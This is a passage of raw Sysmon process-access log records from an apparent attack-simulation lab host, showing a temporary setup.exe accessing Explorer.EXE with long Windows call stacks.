L32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64)|C:\Windows\System32\SHELL32.dll+1aa3b1(wow64)|C:\Windows\System32\SHELL32.dll+1a9500(wow64)|C:\Windows\System32\SHELL32.dll+169f5d(wow64) 10341000x800000000000000016603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+475619(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64) 10341000x800000000000000016602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\System32\SHELL32.dll+475619(wow64)|C:\Windows\System32\SHELL32.dll+4739f1(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64)|C:\Windows\System32\windows.storage.dll+25ec8c(wow64)|C:\Windows\System32\windows.storage.dll+102bc8(wow64) 10341000x800000000000000016601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64)|C:\Windows\System32\SHELL32.dll+47387d(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64) 10341000x800000000000000016600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64)|C:\Windows\System32\SHELL32.dll+47387d(wow64)|C:\Windows\System32\SHELL32.dll+476188(wow64)|C:\Windows\System32\SHELL32.dll+472e5b(wow64) 10341000x800000000000000016599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64) 10341000x800000000000000016598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64) 10341000x800000000000000016597Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64)|C:\Windows\System32\SHELL32.dll+47387d(wow64) 10341000x800000000000000016596Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Windows\System32\SHELL32.dll+47577a(wow64)|C:\Windows\System32\SHELL32.dll+472508(wow64)|C:\Windows\System32\SHELL32.dll+47387d(wow64) 10341000x800000000000000016595Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000016594Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000016593Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016592Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000016591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000016590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000016589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000016587Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000016586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:54.333{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 